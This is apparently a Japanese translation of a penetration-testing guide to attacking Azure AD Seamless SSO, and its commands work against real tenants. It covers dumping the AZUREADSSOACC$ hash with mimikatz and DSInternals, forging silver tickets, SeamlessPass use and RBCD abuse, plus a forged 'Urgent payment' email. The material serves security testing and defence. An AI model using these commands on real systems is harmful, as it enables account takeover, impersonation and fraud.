Az - シームレスSSO

Reading time: 14 minutes

基本情報

ドキュメントから: Azure Active Directory シームレスシングルサインオン (Azure AD Seamless SSO) は、企業ネットワークに接続された企業デバイス上にいるときに自動的にユーザーをサインインさせます。有効にすると、ユーザーはAzure ADにサインインするためにパスワードを入力する必要がなく、通常はユーザー名すら入力する必要がありません。この機能により、ユーザーは追加のオンプレミスコンポーネントなしで、クラウドベースのアプリケーションに簡単にアクセスできます。

基本的に、Azure AD Seamless SSOは、オンプレミスのドメインに参加しているPC上にいるときにユーザーをサインインさせます。

これは、PHS (パスワードハッシュ同期) と PTA (パススルー認証) の両方でサポートされています。

デスクトップSSOは、認証にKerberosを使用しています。構成されると、Azure AD ConnectはオンプレミスADに**AZUREADSSOACC$というコンピュータアカウントを作成します**。AZUREADSSOACC$アカウントのパスワードは、構成中に平文でEntra IDに送信されます。

Kerberosチケットは、パスワードのNTHash (MD4)を使用して暗号化され、Entra IDは送信されたパスワードを使用してチケットを復号化します。

Entra IDは、Kerberos チケットを受け入れるエンドポイント (https://autologon.microsoftazuread-sso.com) を公開しています。ドメイン参加したマシンのブラウザは、SSOのためにこのエンドポイントにチケットを転送します。

列挙

# Check if the SSO is enabled in the tenant
Import-Module AADInternals
Invoke-AADIntReconAsOutsider -Domain <domain name> | Format-Table

# Check if the AZUREADSSOACC$ account exists in the domain
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADComputer -Filter "SamAccountName -like 'AZUREADSSOACC$'"

# Check it using raw LDAP queries without needing an external module
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(samAccountName=AZUREADSSOACC`$)"
$searcher.FindOne()

ピボット: オンプレ -> クラウド

そのTGSチケットを取得するために、攻撃者は次のいずれかを持っている必要があります:

• 侵害されたユーザーのTGS: メモリ内のHTTP/autologon.microsoftazuread-sso.comへのチケットを持つユーザーのセッションを侵害すると、クラウドリソースにアクセスするためにそれを使用できます。
• 侵害されたユーザーのTGT: たとえ持っていなくても、ユーザーが侵害されている場合、KekeoやRubeusなどの多くのツールに実装されている偽のTGT委任トリックを使用して取得できます。
• 侵害されたユーザーのハッシュまたはパスワード: SeamlessPassは、この情報を使用してドメインコントローラーと通信し、TGTを生成し、その後TGSを生成します。
• ゴールデンチケット: KRBTGTキーを持っている場合、攻撃されたユーザーに必要なTGTを作成できます。
• AZUREADSSOACC$アカウントのハッシュまたはパスワード: この情報とユーザーのセキュリティ識別子(SID)を使用して攻撃することで、サービスチケットを作成し、クラウドに認証することが可能です（前の方法で実行されたように）。

SeamlessPass

このブログ投稿で説明されているように、前述の要件のいずれかを持っていれば、侵害されたユーザーとして、または**AZUREADSSOACC$アカウントのハッシュまたはパスワードを持っていれば、ツールSeamlessPass**を使用してクラウドリソースにアクセスするのは非常に簡単です。

最後に、TGTを使用して、ツールSeamlessPassを使用することが可能です:

# Using the TGT to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
# Using the TGS to access the cloud
seamlesspass -tenant corp.com -tgs user_tgs.ccache
# Using the victims account hash or password to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF
seamlesspass -tenant corp.com -domain corp.local -dc 10.0.1.2 -username user -password password
# Using the AZUREADSSOACC$ account hash (ntlm or aes) to access the cloud with a specific user SID and domain SID
seamlesspass -tenant corp.com -adssoacc-ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF -user-sid S-1-5-21-1234567890-1234567890-1234567890-1234
seamlesspass -tenant corp.com -adssoacc-aes DEADBEEFDEADBEEFDEADBEEFDEADBEEF -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -user-rid 1234
wmic useraccount get name,sid # Get the user SIDs

さらなる情報は、FirefoxをシームレスSSOで動作させるためにこのブログ投稿で見つけることができます。

AZUREADSSOACC$アカウントのハッシュを取得する

ユーザー**AZUREADSSOACC$の** パスワードは決して変更されません。したがって、ドメイン管理者はこのアカウントのハッシュを危険にさらし、それを使用してシルバーチケットを作成し、同期された任意のオンプレミスユーザーでAzureに接続することができます。

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Silverチケットの作成

ハッシュを使用して、silverチケットを生成できます：

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

Firefoxを使用したシルバーチケットの利用

シルバーチケットを利用するには、以下の手順を実行する必要があります：

1. ブラウザを起動する: Mozilla Firefoxを起動します。
2. ブラウザを設定する:

• **about:config**に移動します。
• network.negotiate-auth.trusted-urisの設定を指定されたvalueにします：
• https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
• Firefoxの設定に移動し、Microsoft、職場および学校アカウントのためのWindowsシングルサインオンを許可するを検索して有効にします。

3. Webアプリケーションにアクセスする:

• 組織のAADドメインに統合されたWebアプリケーションにアクセスします。一般的な例はlogin.microsoftonline.comです。

4. 認証プロセス:

• ログイン画面で、ユーザー名を入力し、パスワードフィールドは空白のままにします。
• 続行するには、TABまたはENTERを押します。

オンプレミス -> クラウドへのリソースベースの制約付き委任

攻撃を実行するには、以下が必要です：

• WriteDACL / GenericWrite over AZUREADSSOACC$
• あなたが制御するコンピュータアカウント（ハッシュとパスワード） - 作成することができます

1. ステップ1 – 自分のコンピュータアカウントを追加する

• ATTACKBOX$を作成し、そのSID/NTLMハッシュを表示します。任意のドメインユーザーがこれを行うことができ、MachineAccountQuota > 0の間は可能です。

# Impacket
python3 addcomputer.py CONTOSO/bob:'P@ssw0rd!' -dc-ip 10.0.0.10 \
-computer ATTACKBOX$ -password S3cureP@ss

2. ステップ 2 – AZUREADSSOACC$ に RBCD を付与 - あなたのマシンの SID を msDS-AllowedToActOnBehalfOfOtherIdentity に書き込みます。

python3 rbcd.py CONTOSO/bob:'P@ssw0rd!'@10.0.0.10 \
ATTACKBOX$ AZUREADSSOACC$

# Or, from Windows:
$SID = (Get-ADComputer ATTACKBOX$).SID
Set-ADComputer AZUREADSSOACC$ `
-PrincipalsAllowedToDelegateToAccount $SID

3. ステップ 3 – 任意のユーザー (例: alice) の TGS を偽造する

# Using your machine's password or NTLM hash
python3 getST.py -dc-ip 192.168.1.10 \
-spn HTTP/autologon.microsoftazuread-sso.com \
-impersonate alice \
DOMAIN/ATTACKBOX$ -hashes :9b3c0d06d0b9a6ef9ed0e72fb2b64821

# Produces alice.autologon.ccache

#Or, from Windows:
Rubeus s4u /user:ATTACKBOX$ /rc4:9b3c0d06d0b9a6ef9ed0e72fb2b64821 `
/impersonateuser:alice `
/msdsspn:"HTTP/autologon.microsoftazuread-sso.com" /dc:192.168.1.10 /ptt

あなたは今、TGSを使用して、なりすましユーザーとしてAzureリソースにアクセスできます。

クラウド専用ユーザーのためのKerberosチケットの作成

Active Directory管理者がAzure AD Connectにアクセスできる場合、任意のクラウドユーザーのSIDを設定することができます。この方法で、Kerberos チケットはクラウド専用ユーザーのためにも作成できます。唯一の要件は、SIDが適切なSIDであることです。

参考文献

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
• https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
• https://aadinternals.com/post/on-prem_admin/
• TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory